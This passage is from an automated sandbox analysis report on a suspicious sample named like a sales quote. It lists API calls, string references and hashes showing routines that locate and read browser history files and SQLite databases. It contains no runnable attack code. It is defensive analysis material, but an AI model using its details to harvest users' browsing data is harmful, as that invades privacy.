                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp
                                                                                                    • String ID: @ $SQLite format 3
                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                    • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                    • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmpqsort
                                                                                                    • String ID: /nosort$/sort
                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                    • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                    • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040E60F
                                                                                                    • memset.MSVCRT ref: 0040E629
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Strings
                                                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                    • API String ID: 2887208581-2114579845
                                                                                                    • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                    • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                    APIs
                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(021D0048), ref: 0044DF01
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(021E0050), ref: 0044DF11
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(005E6DD0), ref: 0044DF21
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(021E0458), ref: 0044DF31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                    • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                    • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@DeleteObject
                                                                                                    • String ID: r!A
                                                                                                    • API String ID: 1103273653-628097481
                                                                                                    • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                    • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1033339047-0
                                                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                    APIs
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$memcmp
                                                                                                    • String ID: $$8
                                                                                                    • API String ID: 2808797137-435121686
                                                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                    • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1979745280-0
                                                                                                    • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                    • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                    APIs
                                                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                    • free.MSVCRT ref: 00418803
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1355100292-0
                                                                                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                    • memset.MSVCRT ref: 00403A55
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                    • API String ID: 2641622041-467022611
                                                                                                    • Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                    • Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                    APIs
                                                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 839530781-0
                                                                                                    • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                    • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID: *.*$index.dat
                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                    • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                    • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156039329-0
                                                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 3397143404-0
                                                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
